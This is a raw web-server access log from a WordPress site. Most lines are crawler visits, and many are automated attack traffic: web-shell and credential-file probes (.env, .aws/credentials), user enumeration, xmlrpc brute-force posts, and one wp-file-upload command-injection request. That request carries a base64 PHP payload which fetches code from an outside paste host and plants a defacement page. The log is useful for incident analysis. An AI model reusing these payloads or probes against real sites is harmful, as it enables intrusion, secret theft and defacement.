161.35.15.162 - - [31/Mar/2025:01:27:38 -0400] "GET /wp-content/plugins/Core-Econ/upH.php HTTP/1.1" 200 97645 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
161.35.15.162 - - [31/Mar/2025:01:27:43 -0400] "GET /wp-content/plugins/fix/up.php HTTP/1.1" 200 97663 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
161.35.15.162 - - [31/Mar/2025:01:27:45 -0400] "GET /wp-content/plugins/pwnd/pwnd.php HTTP/1.1" 200 97612 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
161.35.15.162 - - [31/Mar/2025:01:27:50 -0400] "GET /wp-content/plugins/shell/noimg.php HTTP/1.1" 200 97634 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
161.35.15.162 - - [31/Mar/2025:01:28:00 -0400] "GET /WSOEnigma.php HTTP/1.1" 200 97634 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
161.35.15.162 - - [31/Mar/2025:01:28:03 -0400] "GET /wp-content/plugins/pwnd-1/pwnd.php HTTP/1.1" 200 97612 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
161.35.15.162 - - [31/Mar/2025:01:28:14 -0400] "GET /wp-content/plugins/dummyyummy/wp-signup.php HTTP/1.1" 200 97634 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
161.35.15.162 - - [31/Mar/2025:01:28:16 -0400] "GET /wp-content/plugins/clara/clara.php HTTP/1.1" 200 97634 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
43.159.140.236 - - [31/Mar/2025:01:58:29 -0400] "GET / HTTP/1.1" 200 97489 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
216.244.66.202 - - [31/Mar/2025:02:01:39 -0400] "GET /robots.txt HTTP/1.1" 200 97645 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
216.244.66.202 - - [31/Mar/2025:02:07:02 -0400] "GET /get-a-michael-kors-satch HTTP/1.1" 200 97651 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
216.244.66.202 - - [31/Mar/2025:02:09:08 -0400] "GET /exploring-the-magnificence-of-the-tembusu-grand/ HTTP/1.1" 200 97612 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
216.244.66.202 - - [31/Mar/2025:02:13:07 -0400] "GET /guida-alle-carte-di-magic-the-gathering/ HTTP/1.1" 200 97489 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
216.244.66.202 - - [31/Mar/2025:02:24:22 -0400] "GET /affordable-care-act-aca-insurance-calculator-self-insured-person-2024/feed/ HTTP/1.1" 200 97612 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
149.88.19.14 - - [31/Mar/2025:02:35:58 -0400] "GET / HTTP/1.1" 200 97489 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36"
192.42.116.213 - - [31/Mar/2025:02:36:27 -0400] "GET / HTTP/1.1" 200 97634 "saamigraphics.com" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.82 Safari/537.36 OPR/35.0.2066.37 (Edition Campaign 51)"
45.138.16.113 - - [31/Mar/2025:02:38:49 -0400] "GET / HTTP/1.1" 200 33178 "http://saamigraphics.com" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.82 Safari/537.36 OPR/35.0.2066.37 (Edition Campaign 51)"
176.67.83.246 - - [31/Mar/2025:02:44:42 -0400] "GET /cbd-for-anxiety-uk-a-natural-remedy-for-anxiety/ HTTP/1.1" 200 97612 "http://saamigraphics.com/cbd-for-anxiety-uk-a-natural-remedy-for-anxiety/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
137.184.20.51 - - [31/Mar/2025:02:54:02 -0400] "GET /.env HTTP/1.1" 200 97634 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
137.184.20.51 - - [31/Mar/2025:02:54:08 -0400] "POST / HTTP/1.1" 200 97612 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
137.184.20.51 - - [31/Mar/2025:02:54:31 -0400] "GET /.env HTTP/1.1" 200 97634 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
137.184.20.51 - - [31/Mar/2025:02:54:34 -0400] "POST / HTTP/1.1" 200 97634 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
85.208.98.23 - - [31/Mar/2025:02:56:32 -0400] "GET /robots.txt HTTP/1.1" 200 97612 "-" "Mozilla/5.0 (compatible; SemrushBot-BA; +http://www.semrush.com/bot.html)"
52.11.171.106 - - [31/Mar/2025:02:57:55 -0400] "GET / HTTP/1.1" 200 97612 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:109.0) Gecko/20100101 Firefox/110.0"
111.231.1.45 - - [31/Mar/2025:03:03:16 -0400] "GET / HTTP/1.1" 200 97612 "-" "Mozilla/5.0 (Linux; Android 10; LIO-AN00 Build/HUAWEILIO-AN00; wv) MicroMessenger Weixin QQ AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/78.0.3904.62 XWEB/2692 MMWEBSDK/200901 Mobile Safari/537.36"
111.231.1.45 - - [31/Mar/2025:03:10:16 -0400] "GET / HTTP/1.1" 200 97634 "-" "Mozilla/5.0 (Linux; Android 10; LIO-AN00 Build/HUAWEILIO-AN00; wv) MicroMessenger Weixin QQ AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/78.0.3904.62 XWEB/2692 MMWEBSDK/200901 Mobile Safari/537.36"
13.201.67.233 - - [31/Mar/2025:03:30:07 -0400] "GET / HTTP/1.1" 200 97634 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36"
13.201.67.233 - - [31/Mar/2025:03:30:10 -0400] "GET / HTTP/1.1" 200 97634 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36"
13.201.67.233 - - [31/Mar/2025:03:30:12 -0400] "GET /wp-includes/wlwmanifest.xml HTTP/1.1" 200 97612 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36"
13.201.67.233 - - [31/Mar/2025:03:30:14 -0400] "GET /xmlrpc.php?rsd HTTP/1.1" 200 308 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36"
198.54.114.83 - - [31/Mar/2025:03:30:21 -0400] "POST /wp-cron.php?doing_wp_cron=1743406220.2631289958953857421875 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://saamigraphics.com"
13.201.67.233 - - [31/Mar/2025:03:30:22 -0400] "GET /?author=1 HTTP/1.1" 200 97634 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36"
13.201.67.233 - - [31/Mar/2025:03:30:24 -0400] "GET /?author=2 HTTP/1.1" 200 97612 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36"
13.201.67.233 - - [31/Mar/2025:03:30:25 -0400] "GET /?author=3 HTTP/1.1" 200 97634 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36"
13.201.67.233 - - [31/Mar/2025:03:30:25 -0400] "GET /wp-json/wp/v2/users/ HTTP/1.1" 200 97612 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36"
13.201.67.233 - - [31/Mar/2025:03:30:26 -0400] "GET /wp-json/oembed/1.0/embed?url=http://saamigraphics.com HTTP/1.1" 200 97612 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36"
13.201.67.233 - - [31/Mar/2025:03:30:26 -0400] "POST /xmlrpc.php HTTP/1.1" 200 236 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36"
13.201.67.233 - - [31/Mar/2025:03:30:28 -0400] "POST /xmlrpc.php HTTP/1.1" 200 236 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36"
13.201.67.233 - - [31/Mar/2025:03:30:30 -0400] "POST /xmlrpc.php HTTP/1.1" 200 236 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36"
13.201.67.233 - - [31/Mar/2025:03:30:31 -0400] "POST /xmlrpc.php HTTP/1.1" 200 236 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36"
13.201.67.233 - - [31/Mar/2025:03:30:33 -0400] "POST /xmlrpc.php HTTP/1.1" 200 236 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36"
13.201.67.233 - - [31/Mar/2025:03:30:35 -0400] "POST /xmlrpc.php HTTP/1.1" 200 236 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36"
216.244.66.202 - - [31/Mar/2025:03:33:20 -0400] "GET /robots.txt HTTP/1.1" 200 97634 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
216.244.66.202 - - [31/Mar/2025:03:40:18 -0400] "GET /streamlined-process-for-fda-otc-registration/ HTTP/1.1" 200 97612 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
195.26.225.218 - - [31/Mar/2025:03:43:06 -0400] "GET /verbessern-sie-ihre-personlichkeit-mit-korperschmuck/ HTTP/1.1" 200 97663 "http://saamigraphics.com/verbessern-sie-ihre-personlichkeit-mit-korperschmuck/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
195.26.225.218 - - [31/Mar/2025:03:43:07 -0400] "GET /verbessern-sie-ihre-personlichkeit-mit-korperschmuck/ HTTP/1.1" 200 97542 "http://saamigraphics.com/verbessern-sie-ihre-personlichkeit-mit-korperschmuck/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
195.26.225.218 - - [31/Mar/2025:03:43:16 -0400] "GET /verbessern-sie-ihre-personlichkeit-mit-korperschmuck/ HTTP/1.1" 200 97634 "http://saamigraphics.com/verbessern-sie-ihre-personlichkeit-mit-korperschmuck/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
43.134.29.139 - - [31/Mar/2025:03:48:20 -0400] "GET /gambling-lotto-can-be-harmful/ HTTP/1.1" 200 97542 "http://saamigraphics.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36"
216.244.66.202 - - [31/Mar/2025:03:54:24 -0400] "GET /2022/04/06/legit-escort-sites-callgirls-oslo-kondomeriet-rabattkode-elin-tvedt-naken/ HTTP/1.1" 200 97548 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
198.54.114.83 - - [31/Mar/2025:04:07:03 -0400] "POST /wp-cron.php?doing_wp_cron=1743408423.0082719326019287109375 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://saamigraphics.com"
167.172.130.206 - - [31/Mar/2025:04:06:58 -0400] "GET /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
170.106.180.153 - - [31/Mar/2025:04:28:33 -0400] "GET / HTTP/1.1" 200 97634 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
198.54.114.83 - - [31/Mar/2025:04:37:18 -0400] "POST /wp-cron.php?doing_wp_cron=1743410238.7298090457916259765625 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://saamigraphics.com"
2603:6081:7600:a32e:deda:7bc4:df63:5181 - - [31/Mar/2025:04:37:13 -0400] "POST /xmlrpc.php HTTP/1.1" 200 212 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36"
14.226.52.218 - - [31/Mar/2025:04:37:20 -0400] "POST /xmlrpc.php HTTP/1.1" 200 212 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36"
216.244.66.202 - - [31/Mar/2025:05:05:09 -0400] "GET /robots.txt HTTP/1.1" 200 97634 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
196.251.88.242 - - [31/Mar/2025:05:06:44 -0400] "POST /wp-content/plugins/wp-file-upload/wfu_file_downloader.php?0=echo%20%60echo%20PD9waHAgZndyaXRlKGZvcGVuKCRfU0VSVkVSWydET0NVTUVOVF9ST09UJ10uJy9oay5waHAnLCd3KycpLGZpbGVfZ2V0X2NvbnRlbnRzKCdodHRwczovL2dob3N0YmluLnNpdGUvb2NidmQvcmF3JykpOyBmd3JpdGUoZm9wZW4oJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2IweC5odG0nLCd3KycpLCdIYWNrZWQgYnkgUnhSJyk7Pz4=%20%7C%20base64%20--decode%60%3Ede.php;&file=p&ticket=H&handler=dboption&session_legacy=1&dboption_base=cookies&dboption_useold=0&wfu_cookie=wp_wpfileupload_9 HTTP/1.1" 200 97648 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
196.251.88.242 - - [31/Mar/2025:05:06:50 -0400] "GET /wp-content/plugins/wp-file-upload/de.php HTTP/1.1" 200 97612 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
14.128.63.109 - - [31/Mar/2025:05:06:58 -0400] "GET /zb_system/login.php HTTP/1.1" 200 97612 "http://saamigraphics.com/zb_system/login.php" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
152.42.177.187 - - [31/Mar/2025:05:12:44 -0400] "GET /wp-content/themes/wp-pridmag/up.php HTTP/1.1" 200 97612 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
216.244.66.202 - - [31/Mar/2025:05:17:38 -0400] "GET /winterdienst-in-luneburg/feed/ HTTP/1.1" 200 97524 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
216.244.66.202 - - [31/Mar/2025:05:18:24 -0400] "GET /types-of-magnetic-signs/ HTTP/1.1" 200 97663 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
216.244.66.202 - - [31/Mar/2025:05:29:23 -0400] "GET /agencia-de-marketing-digital/feed/ HTTP/1.1" 200 97634 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
14.215.163.132 - - [31/Mar/2025:05:32:57 -0400] "GET / HTTP/1.1" 200 97489 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
85.208.98.23 - - [31/Mar/2025:05:36:17 -0400] "GET /robots.txt HTTP/1.1" 200 97612 "-" "Mozilla/5.0 (compatible; SemrushBot-BA; +http://www.semrush.com/bot.html)"
156.228.100.56 - - [31/Mar/2025:05:40:59 -0400] "GET /vendor/phpunit/phpunit/LICENSE HTTP/1.1" 200 97612 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
156.228.100.56 - - [31/Mar/2025:05:41:02 -0400] "GET /vendor/phpunit/phpunit/src/Util/PHP/ HTTP/1.1" 200 97663 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
198.54.114.83 - - [31/Mar/2025:05:41:05 -0400] "POST /wp-cron.php?doing_wp_cron=1743414065.4414169788360595703125 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://saamigraphics.com"
156.228.100.56 - - [31/Mar/2025:05:41:04 -0400] "GET /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
216.244.66.202 - - [31/Mar/2025:06:35:04 -0400] "GET /robots.txt HTTP/1.1" 200 97634 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
104.37.26.98 - - [31/Mar/2025:06:38:18 -0400] "GET / HTTP/1.1" 200 97634 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; Zoom 3.6.0; rv:11.0) like Gecko"
216.244.66.202 - - [31/Mar/2025:06:44:09 -0400] "GET /2024/page/18/ HTTP/1.1" 200 97489 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
216.244.66.202 - - [31/Mar/2025:06:51:45 -0400] "GET /2023/05/page/3/ HTTP/1.1" 200 97634 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
216.244.66.202 - - [31/Mar/2025:06:51:49 -0400] "GET /retinol-101-everything-you-need-to-know-before-you-buy-retinoin-uk/feed/ HTTP/1.1" 200 97663 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
196.251.69.226 - - [31/Mar/2025:07:00:16 -0400] "GET /simple.php HTTP/1.1" 200 97663 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
196.251.69.226 - - [31/Mar/2025:07:01:04 -0400] "GET /inputs.php HTTP/1.1" 200 97612 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
170.106.180.246 - - [31/Mar/2025:07:05:34 -0400] "GET / HTTP/1.1" 200 97634 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
196.251.69.226 - - [31/Mar/2025:07:17:20 -0400] "POST /wp-content/plugins/wp-ver.php HTTP/1.1" 200 97634 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
78.153.140.218 - - [31/Mar/2025:07:17:39 -0400] "GET /.env HTTP/1.1" 200 97542 "-" "Opera/9.22 (Windows NT 6.0; U; ru)"
78.153.140.218 - - [31/Mar/2025:07:17:39 -0400] "GET /.env HTTP/1.1" 200 97651 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ja-JP) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.3 Safari/533.19.4"
78.153.140.218 - - [31/Mar/2025:07:17:56 -0400] "GET /.aws/credentials HTTP/1.1" 200 97489 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_5; ja-jp) AppleWebKit/525.26.2 (KHTML, like Gecko) Version/3.2 Safari/525.26.12"
78.153.140.218 - - [31/Mar/2025:07:17:56 -0400] "GET /.aws/credentials HTTP/1.1" 200 97489 "-" "Mozilla/5.0 (Linux; U; Android 4.0.4; sv-se; ST21i Build/11.0.A.4.22) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30"
78.153.140.218 - - [31/Mar/2025:07:18:06 -0400] "GET /.env.example HTTP/1.1" 200 97529 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
78.153.140.218 - - [31/Mar/2025:07:18:07 -0400] "GET /.env.example HTTP/1.1" 200 97634 "-" "Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
78.153.140.218 - - [31/Mar/2025:07:18:19 -0400] "GET /.env.production HTTP/1.1" 200 97645 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US) AppleWebKit/525.13 (KHTML, like Gecko) Chrome/0.2.149.27 Safari/525.13"
78.153.140.218 - - [31/Mar/2025:07:18:25 -0400] "GET /admin/.env HTTP/1.1" 200 97542 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2480.0 Safari/537.36"
78.153.140.218 - - [31/Mar/2025:07:18:26 -0400] "GET /.env.production HTTP/1.1" 200 97634 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:15.0) Gecko/20100101 Firefox/15.0.1"
90.187.238.157 - - [31/Mar/2025:07:18:55 -0400] "GET / HTTP/1.1" 200 97489 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36"
90.187.238.157 - - [31/Mar/2025:07:19:11 -0400] "GET / HTTP/1.1" 200 97548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36"
90.187.238.157 - - [31/Mar/2025:07:28:17 -0400] "GET / HTTP/1.1" 200 97542 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36"
216.244.66.202 - - [31/Mar/2025:07:29:17 -0400] "GET /womens-slouch-socks/feed/ HTTP/1.1" 200 97612 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
192.30.83.244 - - [31/Mar/2025:07:39:49 -0400] "GET / HTTP/1.1" 200 97489 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 Edg/130.0.2849.56"
43.130.248.83 - - [31/Mar/2025:07:40:23 -0400] "GET /un-examen-des-produits-de-securite-a-domicile/ HTTP/1.1" 200 97612 "http://saamigraphics.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36"
196.251.69.226 - - [31/Mar/2025:07:45:20 -0400] "POST /wp-content/plugins/wp-ver.php HTTP/1.1" 200 97489 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
43.134.29.139 - - [31/Mar/2025:08:00:30 -0400] "GET /verbessern-sie-ihre-personlichkeit-mit-korperschmuck/ HTTP/1.1" 200 97634 "http://saamigraphics.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36"
198.54.114.83 - - [31/Mar/2025:08:03:30 -0400] "POST /wp-cron.php?doing_wp_cron=1743422610.0228869915008544921875 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://saamigraphics.com"
190.89.4.232 - - [31/Mar/2025:08:03:26 -0400] "POST /xmlrpc.php HTTP/1.1" 200 212 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.99 Safari/537.36"
171.235.127.93 - - [31/Mar/2025:08:03:31 -0400] "POST /xmlrpc.php HTTP/1.1" 200 212 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.1 Safari/605.1.15"
40.88.21.235 - - [31/Mar/2025:09:07:03 -0400] "GET / HTTP/1.1" 200 97489 "http://saamigraphics.com/" "DuckDuckBot/1.1; (+http://duckduckgo.com/duckduckbot.html)"
40.88.21.235 - - [31/Mar/2025:09:07:06 -0400] "GET /favicon.ico HTTP/1.1" 404 1251 "http://saamigraphics.com/favicon.ico" "DuckDuckBot/1.1; (+http://duckduckgo.com/duckduckbot.html)"
139.59.58.254 - - [31/Mar/2025:09:19:34 -0400] "GET / HTTP/1.1" 200 97489 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4859.172 Safari/537.36"
43.167.245.18 - - [31/Mar/2025:09:22:56 -0400] "GET / HTTP/1.1" 200 97542 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
216.244.66.202 - - [31/Mar/2025:09:31:45 -0400] "GET /robots.txt HTTP/1.1" 200 97489 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
109.248.204.70 - - [31/Mar/2025:09:37:51 -0400] "GET /wp-content/plugins/wp-automatic/changelog HTTP/1.1" 200 97542 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
2.59.50.137 - - [31/Mar/2025:09:37:53 -0400] "GET /wp-content/plugins/wp-automatic/changelog HTTP/1.1" 200 97489 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
194.38.23.16 - - [31/Mar/2025:09:40:36 -0400] "GET /plugins/html5-file-upload/html5fileupload.remove.php HTTP/1.1" 200 97489 "-" "ALittle Client"
